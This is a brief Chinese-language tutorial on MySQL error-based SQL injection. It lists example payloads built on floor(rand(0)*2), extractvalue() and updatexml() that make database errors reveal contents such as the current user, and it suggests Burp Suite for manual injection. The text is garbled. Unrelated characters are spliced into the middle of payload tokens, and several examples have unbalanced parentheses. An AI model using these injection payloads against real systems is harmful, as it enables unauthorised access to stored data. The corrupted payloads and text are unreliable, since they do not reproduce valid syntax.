1、正常用户访问服务器发送id信息返回正确的id数据。报错注入是想办法构造语句,让错误信息中可以显示数据库的内容;如果能让错误信息中返回数据库中的内容,即实现SQL注入。
2、常见floor()报错注入方法:Example select count(*) from infomatio荏鱿胫协n_schema.tables group by concat((select user()),floor(rand(0)*2);打开MySQL命令框输入命令查看报错信息。
3、extractvalue()报错注入方法:select extractvalue(1,concat(0x7e,(select user()像粜杵泳),0x7e));extractvalue()接收两个参数,第一个XML文档,第二个xpath语句。xpath语句格式错误返回数据。MySQL命令行中测试查看。
4、updatexml()报错注入方法:select updatexml(1,concat(0x7e,(select user()),0x7e,1);查询出所有库以及security中所有表的信息。
5、进行手工注入的过程中可以使用burp suite工具配合使用,快速的获取需要的数据。
